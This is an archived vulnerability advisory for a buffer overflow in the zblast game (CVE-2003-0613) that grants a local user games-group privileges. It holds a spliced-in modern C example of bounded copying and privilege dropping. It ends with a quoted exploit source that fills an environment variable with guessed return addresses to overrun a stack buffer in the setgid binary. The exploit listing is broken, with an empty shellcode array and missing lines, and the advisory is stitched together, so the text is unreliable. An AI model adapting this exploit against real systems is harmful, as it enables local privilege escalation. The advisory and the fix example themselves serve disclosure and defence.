Category: Application (Game) > zblast
Vendors: Marks, Russell
zblast Game Environment Variable Buffer Overflow Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1006943
CVE Reference:   CVE-2003-0613
Updated:  Aug 9 2003
Original Entry Date:  Jun 6 2003
Impact:   Execution of arbitrary code via local system, User access via network
Exploit Included:  Yes  
Version(s): 1.2
Description:   A buffer overflow vulnerability was reported in the 'zblast' game software. A local user can obtain elevated privileges on the system.

v9 reported that a local user can cause arbitrary code to be executed by the X version of zblast when the game writes high scores to the high scores file. The flaw resides in the 'hiscores.c' file, where the ZBLAST_NAME, USER, and LOGNAME environment variables are copied into a fixed-size buffer of 1024 characters without checking that the copied length will fit within the allocated buffer.
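The defect is an unbounded strcpy() of an environment variable into a 1024-byte stack buffer inside a setgid/setuid binary that has not yet dropped its privileges. The following is an added example written for this entry, not code from zblast or from the advisory: it shows a bounded replacement for that copy, the ZBLAST_NAME/USER/LOGNAME precedence the entry describes, and a checked privilege drop performed before any environment-derived input is handled. The names copy_bounded, resolve_player_name, drop_privileges, sample_getenv, set_sample_env and long_name are this example's own, and the sample environment table is constructed here so the logic runs offline.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Declared explicitly so the example builds even if _GNU_SOURCE was
 * defined too late for <unistd.h> to expose these Linux calls. */
int setresuid(uid_t ruid, uid_t euid, uid_t suid);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

#define NAME_BUF 1024   /* same capacity as the game's name[1024] buffer */

/* Bounded replacement for strcpy(name, ptr): dst is always NUL-terminated.
 * Returns 0 if src fit, -1 if it had to be truncated (dst is still valid). */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n;
    if (dstsz == 0) return -1;
    n = strnlen(src, dstsz);          /* never scans past dstsz bytes */
    if (n >= dstsz) {                 /* no room for the terminator */
        memcpy(dst, src, dstsz - 1);
        dst[dstsz - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Constructed stand-in for the process environment (hypothetical helper,
 * not part of zblast) so the lookup can be exercised without setenv(). */
static const char *sample_env[3];   /* ZBLAST_NAME, USER, LOGNAME */
void set_sample_env(const char *zb, const char *user, const char *logname)
{
    sample_env[0] = zb; sample_env[1] = user; sample_env[2] = logname;
}
const char *sample_getenv(const char *key)
{
    if (strcmp(key, "ZBLAST_NAME") == 0) return sample_env[0];
    if (strcmp(key, "USER") == 0)        return sample_env[1];
    if (strcmp(key, "LOGNAME") == 0)     return sample_env[2];
    return NULL;
}
/* A constructed over-long value (len bytes of 'A'): the kind of input that
 * overruns an unbounded 1024-byte copy. */
const char *long_name(size_t len)
{
    static char buf[4096];
    if (len >= sizeof buf) len = sizeof buf - 1;
    memset(buf, 'A', len);
    buf[len] = '\0';
    return buf;
}

/* Resolve the player name in the precedence the entry lists (ZBLAST_NAME,
 * then USER, then LOGNAME) with a bounded copy. Returns 1 if a name was
 * found and fit, -1 if it was truncated, 0 if none was set (name = ""). */
int resolve_player_name(char *name, size_t namesz,
                        const char *(*getvar)(const char *))
{
    static const char *const vars[] = { "ZBLAST_NAME", "USER", "LOGNAME" };
    size_t i;
    for (i = 0; i < sizeof vars / sizeof vars[0]; i++) {
        const char *val = getvar(vars[i]);
        if (val != NULL && *val != '\0')
            return copy_bounded(name, namesz, val) == 0 ? 1 : -1;
    }
    name[0] = '\0';
    return 0;
}

/* Permanently drop a setuid/setgid binary to the invoking user before any
 * attacker-influenced input is touched. Group first, every call checked,
 * result verified. setres*() also clears the saved ids, which a plain
 * setgid(getgid()) in a non-root setgid-games binary leaves in place. */
int drop_privileges(void)
{
    uid_t u = getuid();
    gid_t g = getgid();
    if (setresgid(g, g, g) != 0) return -1;
    if (setresuid(u, u, u) != 0) return -1;
    if (getegid() != g || geteuid() != u) return -1;
    return 0;
}

static const char *real_getenv(const char *key) { return getenv(key); }

int main(void)
{
    char name[NAME_BUF];
    int rc;
    if (drop_privileges() != 0) { perror("drop_privileges"); return 1; }
    rc = resolve_player_name(name, sizeof name, real_getenv);
    if (rc < 0) fprintf(stderr, "warning: player name truncated\n");
    printf("player name: \"%s\"\n", name);
    return 0;
}
```

With this ordering an over-long ZBLAST_NAME can at worst produce a truncated high-score entry, and even a remaining parsing bug would run with the caller's own uid and gid rather than the games group.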

A local user can obtain 'games' user privileges.

A demonstration exploit is provided in the Source Message.

Impact:   A local user can execute arbitrary code with 'games' user privileges.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Aug 9 2003 (Debian Issues Fix) zblast Game Environment Variable Buffer Overflow Lets Local Users Gain Elevated Privileges
Debian has released a fix.

 Source Message Contents

Subject:  linux)zblast/xzb[v1.2]: local buffer overflow. (games)

not much explanation needed, simple overflow.

vade79 -> -> fakehalo

-- xxzb.c --

/* (linux)zblast/xzb[v1.2]: local buffer overflow.
   by: v9[].

   zblast/xzb is a common svgalib/X game, included on's program downloads:

   this exploit gives uid=20(games), using the X version
   of zblast.  both versions are based of the same code,
   except for the fact privileges are only dropped in the
   svgalib version:
    zblast.c:2095:#ifndef USE_X
    zblast.c:2096:setuid(getuid()); setgid(getgid());

   now for the point/fun of this.  you have to make it to
   the high scores in the game to exploit this :), as it's
   done when writing the high scores.  although, if there
   is a blank spot in the high scores you can just make
   it happen by typing <enter>, then <esc>.

   file stats(from install):
    -r-xr-sr-x root games /usr/local/games/xzb
    -r-sr-sr-x root games /usr/local/games/zblast

   the bug itself(simple enough):
    hiscore.c:124:void writescore(int score)
    hiscore.c:129:char name[1024],*ptr;
    hiscore.c:148:if(ptr!=NULL) strcpy(name,ptr);
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PATH "/usr/local/games/xzb" /* X binary.     */
#define DEFAULT_OFFSET 500 /* for typical small env. */

static char exec[]=

long esp(void){__asm__("movl %esp,%eax");}

int main(int argc,char **argv){
 char buf[1040];
 int i,offset;
 long ret;

 printf("(*)zblast/xzb[v1.2]: local buffer overflow.\n");
 printf("(*)by: / fakehalo.\n");


 printf("return address: 0x%lx, offset: %d.\n",ret,offset);
 /* alignment will never need to be changed. */
 for(i=0;i<sizeof(buf);i+=4){*(long *)&buf[i]=ret;}
 setenv("ZBLAST_NAME",buf,1); /* or $USER/$LOGNAME. */
  printf("* failed to execute %s.\n",PATH);